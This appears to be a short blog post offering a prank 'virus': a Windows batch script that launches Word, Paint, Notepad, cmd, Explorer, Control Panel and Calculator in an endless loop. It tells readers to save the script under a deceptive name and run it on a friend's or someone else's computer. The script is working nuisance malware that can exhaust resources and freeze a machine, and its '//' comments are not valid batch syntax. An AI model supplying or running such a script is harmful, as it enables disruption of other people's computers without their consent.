Virus to open multiple programs in an infinite loop

Computer virus

     Everyone wants to play around with the tips and trick of computer. Today we will show a simple trick which you can use on your friends computer or someone you want to trick.
What this trick does? It just simply open variety of software programs and it keeps opening them it's like and infinite loop.
here is what you have to do.
1: Open up notepad or any text editor
2: Copy and paste below code
     @echo off // It instructs to hide the commands when batch files is executed
     :x   //loop variable
     start winword 
     start mspaint  //open paint
     start notepad
     start write
     start cmd //open command prompt
     start explorer
     start control
     start calc // open calculator
     goto x // infinite loop
3: Save the file as "filename.bat" you can pick any tricky name and just add .bat at the end.

NOTE: There is possible chance that this will harm your system so don't run it on your own system,                it's just for fun make sure to not harm.

Previous
Next Post »